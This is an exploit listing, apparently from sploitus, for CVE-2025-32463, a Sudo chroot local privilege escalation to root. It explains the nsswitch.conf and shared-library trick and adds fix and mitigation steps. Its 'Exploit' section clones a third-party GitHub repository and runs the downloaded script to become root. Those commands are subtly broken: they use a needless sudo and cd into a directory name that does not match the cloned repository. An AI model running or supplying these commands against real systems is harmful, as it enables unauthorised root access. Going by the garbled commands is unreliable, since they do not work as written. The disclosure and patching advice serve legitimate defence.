## https://sploitus.com/exploit?id=6C460879-71C5-559E-A79C-4FC25D8B115D
# CVE-2025-32463 Local Privilege Escalation to Root via Sudo chroot in Linux π
Here's a summary of **CVE-2025-32463** without links:
---
### π Vulnerability Overview
**CVE-2025-32463** is a **local privilege escalation** vulnerability in **Sudo** versions **1.9.14 through 1.9.17**. It abuses the `--chroot` (`-R`) option by manipulating how Sudo handles `nsswitch.conf`. This allows a local attacker to trick Sudo into loading a **malicious shared library**, gaining **root access**, even if they aren't in the `sudoers` file.
---
### β οΈ Severity
* **CVSS 3.1 Score**: 9.3 (Critical β«)
* **Attack Vector**: Local
* **Privileges Required**: None
* **User Interaction**: None
---
### π Exploit
```
sudo git clone https://github.com/B1ack4ash/Blackash-CVE-2025-32463.git
cd CVE-2025-32463
chmod +x CVE-2025-32463.sh
id
./CVE-2025-32463.sh
id
```
---
### π οΈ How the Exploit Works
1. The attacker runs a command like `sudo -R /fake-dir some-command`.
2. Inside `/fake-dir`, they place a fake `etc/nsswitch.conf` that forces Sudo to resolve users or groups via a custom method.
3. This tricks Sudo into loading and executing a **malicious shared library**, leading to **code execution as root**.
---
### π Affected Systems
* Any Linux/Unix-like system running **Sudo 1.9.14 to 1.9.17**
* Systems allowing local shell access (even with no sudo privileges)
* Includes major distributions like Ubuntu, Debian, Red Hat, Fedora, SUSE, Alpine, etc.
---
### β Fixed In
* **Sudo 1.9.17p1** and newer
* Older versions **before 1.9.14** are not affected (they lack the vulnerable chroot feature)
---
### π‘οΈ Mitigation Steps
1. **Check your version** using `sudo --version`
2. **Update Sudo** to 1.9.17p1 or latest available version
3. Avoid using `--chroot` option unless necessary
4. Monitor logs for unusual sudo or NSS behavior
---
### π£ Key Takeaway
Even if a user doesnβt have sudo rights, they can potentially become root by abusing this bug. Itβs a critical issue affecting many systems, and it should be patched **immediately**.
---
### β οΈ Disclaimer
This PoC is provided for educational and research purposes only. Running this on any system without permission is illegal and unethical !!!